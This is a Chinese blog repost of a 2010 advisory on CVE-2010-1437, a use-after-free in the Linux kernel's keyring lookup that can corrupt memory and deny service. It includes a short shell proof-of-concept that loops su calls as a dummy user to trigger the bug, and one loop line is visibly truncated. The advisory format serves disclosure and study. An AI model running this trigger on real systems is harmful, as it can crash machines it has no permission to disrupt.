linux keyring原理,Linux Kernel find_keyring_by_name()函数本地内存破坏漏洞

最新推荐文章于 2023-12-14 20:58:47 发布
最新推荐文章于 2023-12-14 20:58:47 发布
阅读量233 收藏
点赞数
文章标签: linux keyring原理

发布日期:2010-04-27

更新日期:2010-04-28

受影响系统:

Linux kernel 2.6.34-rc5

描述:

--------------------------------------------------------------------------------

BUGTRAQ  ID: 39719

CVE ID: CVE-2010-1437

Linux Kernel是开放源码操作系统Linux所使用的内核。

Linux Kernel的find_keyring_by_name()函数可能获得已经释放的密钥环,之后再访问该密钥环就会触发内存破坏,导致拒绝服务的情况。

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/bin/sh

LOOP=100000

USER=dummy_user

# add

/bin/su -c "exit;" $USER || { /usr/sbin/adduser -m $USER; add=1; }

for ((i=0; i

do

/bin/su -c "echo '$i' > /dev/null" $USER

done

# del

(( add == 1 )) && /usr/sbin/userdel -r $USER

exit

建议:

--------------------------------------------------------------------------------

厂商补丁:

Linux

-----

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

0b1331709591d260c1c78e86d0c51c18.png

Layeon
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MySQL 整表加密解决方案 keyring_file详解
09-09
主要介绍了MySQL 整表加密解决方案 keyring_file详解,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
linux keyring原理,Linux keyring提权漏洞分析(CVE
weixin_39568232的博客
05-13 797
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?0x0 序本文深入分析今年初公开的一个Linux提权漏洞,分析该漏洞之前先介绍下Linux密钥保留服务,该服务主要用于在内核中缓存身份验证数据,使内核可以快速访问所需的密钥,还可以将密钥的操作(keyctl, add_key, request_key)委托给用户态进程,同时该服务定义了两个标准密钥类型user和keyri...
关于keyrings_1
yss2333333的博客
11-24 1042
例如,可以使用<keyring>参数创建一个新的Keyring,将密钥添加到已存在的Keyring中,或者在Keyring中搜索、显示或删除密钥。通过Keyrings,用户可以轻松地导入、导出、创建和删除GPG密钥,以及执行与GPG相关的操作,如加密、解密和签名。总而言之,CentOS 7的Keyrings是一种用于管理加密密钥和证书的工具,可以帮助用户安全地存储和管理敏感信息。这些命令和子命令提供了在命令行界面下管理密钥和证书的功能,可以用于创建、导入、导出、删除、显示和验证密钥和证书。
Linux 密钥保留服务keyring入门
Lee notes
01-15 6589
Linux 密钥保留服务入门 使用 Linux 内核 API 创建新的密钥类型 [外链图片转存中…(img-NfN8MzPL-1610692836224)] Avinesh Kumar 2007 年 7 月 05 日发布 **Linux 密钥保留服务(Linux key retention service)**是在 Linux 2.6 中引入的,它的主要意图是在 Linux 内核中缓存身份验证数据。远程文件系统和其他内核服务可以使用这个服务来管理密码学、身份验证标记、跨域用户映射和其他安全问题。它还使 Li
Linux内核密钥环
最新发布
李老板的移动安全杂货铺
12-14 811
在此示例中,`keyring_example_init()`函数创建了一个名为`my_keyring`的密钥环,并将其存储在指针`my_key`中。例如,`keyctl_instantiate_key()`用于创建密钥,`keyctl_search()`用于根据指定条件搜索密钥,`keyctl_unlink()`用于删除密钥等。在密钥环中,密钥通过一个哈希表进行管理。当需要使用密钥时,应用程序通过调用`search_keyring()`函数从密钥环中搜索密钥,并将找到的密钥返回给应用程序使用。
【转】Linux内核安全技术(四):Vold原理介绍
叫好与叫座虽然不是对立面,但想在同一个作品中达到双重效果很难。
06-10 583
Android中Vold是volume Daemon,即Volume守护进程,用来管理Android中存储类的热拔插事件。这里的热插拔涉及的场景如:手机usb以MTP或者传输照片方式插拔PC端后磁盘数据的挂卸载;设备开关机过程中存储设备各分区的挂卸载;T卡插拔识别过程中文件系统挂卸载。在各场景做mount过程中,涉及到的磁盘数据的安全加密(FDE/FBE),文件节点与目录的创建,文件系统的垃圾清理等模块,也由Vold进行控制。
【转】Linux内核安全技术(三):Android系统安全技术---FBE密钥框架和技术详解
叫好与叫座虽然不是对立面,但想在同一个作品中达到双重效果很难。
06-10 907
用户数据加密是移动设备的重要功能,是使用对称加密算法对Android设备上的所有用户数据进行编码的过程,防止用户数据被未经授权的用户或应用程序访问。本文是Android系统安全技术系列第二篇,主要介绍基于文件的加密技术。首先介绍Android保护用户隐私数据的技术方案,包括全盘加密FDE、文件加密FBE元数据加密ME。其次介绍基于文件加密FBE的密钥管理,涉及HAL、Linux Kernel、TEE和Hardware。
linux内核密钥保留,linux keyring使用方法 密钥保留服务
weixin_29216049的博客
04-29 558
Linux® 密钥保留服务是在 Linux 2.6 中引入的,这是在 Linux 平台上处理身份验证、密码学、跨域用户映射和其他安全问题的出色的新方法。了解 Linux 密钥保留服务的组件,并通过一个示例应用程序了解它的使用方法。简要介绍见:本文主要讲关于keyutils的编程方法,解决在使用keyutils过程中出现的问题.问题1:使用keyutils时,.c或.cpp中包含#include 若...
IIS_keyring.hlp
11-22
IIS_keyring.hlp安装IIS时所要的文件
libgnome-keyring-devel-3.12.0-1.el7.x86_64.rpm
11-30
离线安装包,亲测可用
gnome-keyring-pam-3.28.2-1.el7.x86_64.rpm
11-30
离线安装包,亲测可用
linux keyring原理,漏洞名称:Linux kernel keyring功能root权限提升漏洞
weixin_39524834的博客
05-13 305
漏洞名称:Linux kernel keyring功能root权限提升漏洞发表日期:2016-01-25 11:20:55漏洞名称:Linux kernel keyring功能root权限提升漏洞(CVE-2016-0728)CVE ID:CVE-2016-0728受影响系统:Linux kernel >= 3.8详细信息:Linux KernelLinux操作系统的内核。keyrings...
linux内核密钥保留,Linux kernel keyring功能root权限提升漏洞(CVE-2016-0728)
weixin_29051811的博客
04-29 512
Linux kernel keyring功能root权限提升漏洞(CVE-2016-0728)发布日期:2016-01-19更新日期:2016-01-20受影响系统:Linux kernel >= 3.8描述:CVE(CAN) ID: CVE-2016-0728Linux KernelLinux操作系统的内核。keyrings功能是驱动程序用于保留或缓存安全数据、身份验证密钥、加密密钥及其...
linux驱动之设备树的介绍
qq_40684669的博客
09-18 1750
linux驱动开发中, 设备树的介绍
linux系统问题
weixin_42381854的博客
06-07 392
  问题1: ubuntu弹出提示: unlock login keyring Enter password to unlock your login keyring 要反复输入开机密码. 原因: 无线连接的安全设置 解决方法:  1.sudo rm /home/user/.local/share/keyrings/login.keyring 每个人电脑中, keyrings文件夹的路...
linux打开浏览器密码取消,Deepin下打开谷歌chrome浏览器提示解锁登录密钥环的解决方法...
weixin_35860675的博客
05-08 2949
在Deepin Linux系统下打开谷歌chrome浏览器都提示解锁登录密钥环,每次登录打开浏览器都会提醒(解锁登录密钥环:输入密码以解锁您的登录密钥环,您用于登录计算机的密码与您的登录密钥环中的密码不再匹配。),经过查找,找到了解决的方法。背景密钥环是Linux系统用于安全保存程序私密数据的模块,可以用于加密保存密码、证书、密钥等安全数据。chrome的密钥环用于保存本地访问站点密码或缓存从go...
Linux如何用find命令查找文件
热门推荐
linux_tcpdump的博客
01-16 2万+
用途 find命令用于在指定目录下查找文件。 全称 无 参数 -name :后跟需要匹配的文件名模式,需要使用引号引起来 下面是一些简单的示例查找:(~表示$HOME目录) 1.查找当前$HOME下’.log’结尾的文件 find ~ –name “*.log” –print 2.当前目录与子目录下查找所有’.log’结尾的文件 find . –name “*.log” –print 3.当前目录与子目录下查找文件名以一个大写字母开头的文件 find . –name “[A-Z]” –print 4.在/e
linux kernel keys笔记
whuzm08的专栏
02-14 1465
keys在内核中的表示为: struct key { atomic_t usage; /* number of references */ key_serial_t serial; /* key serial number */ union { struct list_head graveya...
cuda-keyring_1.0-1_all.deb
06-06
"cuda-keyring_1.0-1_all.deb"是一个Debian软件包,它包含用于验证CUDA软件包的数字签名的公钥。Debian和Ubuntu等基于Debian的Linux发行版使用APT(Advanced Packaging Tool)作为包管理器,并使用数字签名来验证...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值